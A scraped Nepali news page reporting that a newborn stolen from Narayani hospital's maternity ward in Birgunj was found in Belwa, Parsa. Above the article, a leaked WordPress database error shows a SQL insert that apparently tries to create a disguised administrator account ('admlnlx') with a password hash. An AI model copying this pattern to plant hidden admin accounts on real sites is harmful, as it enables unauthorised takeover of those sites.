WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Brv3Dq9FNKsqeO38MQe4k/IK6T7j6x.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 19:10:11', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
वीरगञ्ज अस्पतालबाट चोरी भएको शिशु फेला पर्‍यो – Gaule Khabar

वीरगञ्ज अस्पतालबाट चोरी भएको शिशु फेला पर्‍यो

वीरगञ्ज अस्पतालबाट चोरी भएको शिशु फेला पर्‍यो

विरगन्ज,माघ २३-

वीरगञ्जको छपकैयामा रहेको नारायणी उपक्षेत्रीय अस्पतालको प्रसूति गृहबाटै माघ २१ मा दिउँसो चोरी भएको शिशु पर्साको बेलवाबाट फेला परेको छ ।

प्रहरी उपरीक्षक गोविन्द शाह नेतृत्वको टोलीले उक्त शिशुको उद्धार गरी नारायणी उपक्षेत्रीय अस्पताल लगिंदैछ । उक्त बच्चालाई पर्सा सिक्टाकी २७ वर्षीया लालसादेवी साहले चोरी गरी बेलवामा लुकाइराखेको अवस्थामा उद्धार गरिएको प्रहरीले जनाएको छ ।

वीरगञ्ज उपमहानगरपालिका–१ की आशादेवी पासवानको नवजात शिशु २१ माघ दिउसो २ बजे प्रस्तुति गृहबाट चोरी भएको थियो । बिहान ७ बजे भर्ना भएकी आशादेवीले १० बजेर ४० मिनेट शिशुलाई जन्म दिएपछि आशालाई २ बजे अस्पतालको वेडमा सारिएको थियो ।

रक्तस्राव हुन थालेपछि उपचार गराउन प्रसुति वार्डमा लगेको केही बेरमै अस्पतालको अर्को वेडमा रहेकी अपरिचित महिलाले शिशुलाई खेलाउदै बाहिर लगेकी थिइन । सासू रमावतीदेवी बुहारी कुर्न बसेकी थिइन् । त्यही बेला उक्त अपरिचित महिलाले उनलाई ५० रुपैयाँ दिएर दुध र पाउरोटी ल्याउनु म बच्चा हेर्छु भनेर बाहिर पठाएको रमावतीले बताइन् ।

आफ्नो नातीलाई दुध र पाउरोटी किन्न रमावतीदेवी बाहिर गएकै समयमा ती महिला बच्चा लिएर फरार भएको पीडितले आरोप लगाएकी थिइन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका